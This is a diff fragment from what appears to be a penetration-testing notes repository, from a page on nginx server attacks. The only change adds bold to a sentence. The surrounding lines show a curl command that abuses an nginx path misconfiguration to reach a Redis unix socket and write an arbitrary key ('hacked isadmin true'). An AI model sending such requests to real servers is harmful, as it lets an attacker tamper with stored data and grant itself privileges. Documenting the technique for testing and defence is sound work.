v4resk/red-book/web/infra/servers/nginx.md

 Connection: close
 ```

-For example, we can use it to make requests to a Redis socket and write any key:
+For example, we can use it to make requests to a Redis socket and **write any key**:
 ```bash
 #Request that set the key: "hacked" "isadmin" true
 curl -X HSET "http://example.com/static/unix:/var/run/redis/redis.sock:hacked%20isadmin%20true%20/random"